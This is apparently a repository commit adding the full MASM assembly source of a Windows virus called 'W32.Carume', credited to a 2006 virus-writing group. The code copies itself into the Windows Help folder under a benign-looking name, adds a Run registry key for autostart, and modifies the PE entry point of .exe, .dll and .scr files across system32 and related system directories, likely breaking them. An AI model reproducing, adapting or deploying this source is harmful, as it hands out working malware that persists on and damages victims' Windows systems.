Add files via upload

2026-06-16 15:59:24 +00:00 · 2020-10-10 22:07:43 -05:00
parent b3ade600b3
commit 3cac606e5f
100 changed files with 186749 additions and 0 deletions
@@ -0,0 +1,381 @@
+;
+; W32.Carume
+;
+; Written by RadiatioN @ XERO VX and hacking group in February-March 2006
+;
+; THIS FILE HAS NO COPYRIGHTS! I AM NOT RESPONSIBLE FOR ANY DAMAGE WITH THAT CODE!
+; 
+; Compile with masm 8.2
+;
+; greetings to vBx and SkyOut
+;
+; What does this Code?
+;  - Copy itself to %WINDIR%\Help\WinHelpCenter.exe
+;  - Adds a new registry entry for autostarting itself
+;  - Searches in
+;     %WINDIR%\ServicePackFiles\i386\
+;     %WINDIR%\
+;     %WINDIR%\system32\
+;     %WINDIR%\system32\dllcache\
+;    for file extension files like
+;     .exe
+;     .dll
+;     .scr
+;    to infect it
+;  - infecting file by changing the RVA entry point of the file
+;
+
+.386
+.model flat,stdcall
+option casemap:none
+
+   include windows.inc
+   include user32.inc
+   include kernel32.inc
+   include advapi32.inc
+   
+   includelib user32.lib
+   includelib kernel32.lib
+   includelib advapi32.lib
+
+.data
+	; Directories to infect
+	szDirectory				db 		"\ServicePackFiles\i386\", 0, "\", 0, "\system32\", 0, "\system32\dllcache\", 0
+	dwDirPos				dword	0
+	dwDirCount				dword	0
+	
+	;virus name
+	szVirName				db		"W32.Carume",0
+	
+	; file extensions to find
+	szFileExtension			db		".exe", 0, ".dll", 0, ".scr", 0
+	dwFileExPos				dword	0
+	dwFileExCount			dword	0
+	
+	; Rest of variables
+	szWinDir				db		260 dup(0)
+	szDirDest				db		260 dup(0)
+	szWildcard				db		'*',0
+	szNewDir				db		"\Help\WinHelpCenter.exe",0
+	szKey					db		"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0
+	szValueName				db		"WinHelpCenter",0
+	
+	hSearch					dword	0
+	dwRetVal				dword	0
+	check					dword	0
+	dwDamnStuff				dword	0
+	dwStartOfPE				dword	0
+	dwEntryPoint			dword	0
+	dwCount					dword	0
+	hKey					dword	0
+	
+	; WIN32_FIND_DATA structure
+    dwFileAttributes		dword	0 
+        ;FILETIME structure
+        ftCreationTime 		dword	0
+    	ftCreationTime2		dword	0 
+    	;FILETIME structure
+        ftLastAccessTime 	dword	0
+    	ftLastAccessTime2	dword	0    
+    	;FILETIME structure 
+        ftLastWriteTime 	dword	0
+    	ftLastWriteTime2	dword	0
+    nFileSizeHigh			dword	0 
+    nFileSizeLow 			dword	0
+    dwReserved0 			dword	0
+    dwReserved1 			dword	0
+    cFileName				db		260	dup(0) 
+    cAlternateFileName		db		14 	dup(0)
+    
+.code
+start:
+	;Copy File to %WINDIR%\Help\WinHelpCenter.exe
+	invoke GetWindowsDirectory, offset szWinDir, 260
+	
+	push offset szDirDest
+	push offset szNewDir
+	push offset szWinDir
+	call StrCatDest
+	
+	invoke GetCommandLine
+	
+	push eax
+	call RemoveFirstLast
+		
+	invoke CopyFile, eax, offset szDirDest, TRUE
+	
+	invoke RegCreateKey, HKEY_LOCAL_MACHINE, offset szKey, offset hKey
+	
+	invoke lstrlen, offset szDirDest
+	
+	invoke RegSetValueEx, hKey, offset szValueName, 0, REG_SZ, offset szDirDest, eax
+	
+NextDir:
+	;go through directorys and infect the files
+	push offset dwDirPos
+	push offset szDirectory
+	call GetNextString
+	inc dwDirCount
+	mov esi, eax
+	
+	push offset szDirDest
+	push esi
+	push offset szWinDir
+	call StrCatDest
+	
+	push offset szDirDest
+	push offset szWildcard
+	push offset szDirDest
+	call StrCatDest
+	
+	invoke FindFirstFile, offset szDirDest, offset dwFileAttributes
+	mov hSearch, eax
+		
+nextfile:		
+	push offset dwFileExPos
+	push offset szFileExtension
+	call GetNextString
+	inc dwFileExCount
+	
+	push eax 
+	push offset cFileName
+	call InStr2
+	cmp eax, 1
+	je Infect
+	
+	cmp dwFileExCount, 3
+	jne nextfile
+	
+	jmp NoInfection
+
+Infect:
+	push offset szDirDest
+	push esi
+	push offset szWinDir
+	call StrCatDest
+
+	push offset cFileName
+	push offset szDirDest
+	call StrCat
+	
+	;File infection methods
+	;GENERIC_READ | GENERIC_WRITE
+	mov eax, 0C0000000h
+
+	;open file
+	invoke CreateFile, addr szDirDest, eax, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
+	mov dwRetVal, eax
+	
+	;read start of PE header and add value for entry point offset
+	invoke SetFilePointer, dwRetVal, 03Ch, NULL, FILE_BEGIN		
+	invoke ReadFile, dwRetVal, offset dwStartOfPE, 4, offset dwDamnStuff, NULL		
+	add dwStartOfPE, 028h
+	
+	;read entry point and a value
+	invoke SetFilePointer, dwRetVal, dwStartOfPE, NULL, FILE_BEGIN
+	invoke ReadFile, dwRetVal, offset dwEntryPoint, 4, offset dwDamnStuff, NULL
+	add dwEntryPoint, 210h
+	
+	;write new entry point
+	invoke SetFilePointer, dwRetVal, -4, NULL, FILE_CURRENT		
+	invoke WriteFile, dwRetVal, offset dwEntryPoint, 4, offset dwDamnStuff, NULL
+	invoke CloseHandle, dwRetVal	
+	
+NoInfection:
+	mov dwFileExPos, 0	
+	mov dwFileExCount, 0
+	invoke FindNextFile, hSearch, offset dwFileAttributes
+	cmp eax, 0
+	jnz nextfile
+	
+	cmp dwDirCount, 4
+	jne NextDir
+		
+	invoke ExitProcess, 0  
+	
+;nearly equal to the C-function InStr()
+InStr2:
+	pop ebp
+	pop ecx
+	pop check
+	mov edx, check
+	
+InStrLoop:
+	mov al, [ecx]
+	mov bl, [edx]
+
+	cmp al, bl
+	jne InStrRestore
+	inc edx
+	mov bl, [edx]
+	cmp bl, 0
+	je InStrTrue	
+		
+	jmp InStrResume
+	
+InStrRestore:
+	mov edx, check
+
+InStrResume:	
+	cmp al,0
+	je InStrFalse
+	
+	cmp bl,0
+	je InStrFalse
+	
+	inc ecx
+	jmp InStrLoop
+	
+InStrFalse:	
+	mov eax, 0
+	push ebp
+	ret	
+		
+InStrTrue:
+	mov eax, 1
+	push ebp
+	ret
+	
+;nearly equal to the c-function StrCat()
+StrCat:
+	pop ebp
+	pop ecx
+	pop edx
+	
+StrCatLoop:
+	mov al, [ecx]
+	
+	inc ecx
+	
+	cmp al, 0
+	jne StrCatLoop
+	dec ecx
+	
+StrCatLoop2:		
+	mov bl, [edx]
+	mov [ecx], bl 
+	
+	inc ecx
+	inc edx
+	
+	cmp bl,0
+	jne StrCatLoop2
+	
+	push ebp
+	ret
+	
+;modified function of StrCat copys destination string in the 3. argument
+StrCatDest:
+	pop ebp
+	pop	ebx
+	pop ecx
+	pop edx
+	
+StrCatDestLoop:
+	mov al, [ebx]
+	mov [edx], al
+	
+	inc ebx
+	inc edx
+	
+	cmp al, 0
+	jne StrCatDestLoop
+	dec	ebx
+	dec edx
+	
+StrCatDestLoop2:
+	mov bl, [ecx]
+	mov [edx], bl 
+	
+	inc ecx
+	inc edx
+	
+	cmp bl,0
+	jne StrCatDestLoop2
+	
+	push ebp
+	ret
+	
+;equal to the c-function strcpy()
+StrCpy:
+	pop ebp
+	pop ebx
+	pop ecx
+
+StrCpyLoop:
+	mov al, [ebx]
+	mov [ecx], al
+	
+	inc ecx
+	inc ebx
+	
+	cmp al, 0
+	jne StrCpyLoop	
+	
+	push ebp
+	ret
+	
+;gets the next string in an array
+GetNextString:
+    pop ebp
+    pop ebx
+    pop ecx
+
+    add ebx, [ecx]
+        
+    mov al, [ecx]
+    cmp al, 0
+    jnz GetNextStringLoop
+    
+    inc BYTE PTR [ecx]
+    mov eax, ebx
+    push ebp
+    ret
+    
+GetNextStringLoop:
+    mov al, [ebx]
+    
+    inc ebx
+    inc BYTE PTR [ecx]
+    
+    cmp al, 0    
+    jnz GetNextStringLoop
+
+    push ebp
+    mov eax, ebx
+    ret
+
+;removes the first and the last character of a string
+RemoveFirstLast:
+	pop ebp
+	pop ebx
+	
+	inc ebx
+
+RemoveFirstLastLoop:
+
+	mov dl, [ebx]
+	
+	dec ebx
+	
+	mov [ebx], dl
+	
+	inc ebx
+	inc ebx
+	
+	cmp dl,0
+	jnz RemoveFirstLastLoop
+	
+	dec ebx
+	dec ebx
+	dec ebx
+	dec ebx
+	
+	xor dl, dl
+	
+	mov [ebx], dl	
+	
+	push ebp
+	ret
+		
+end start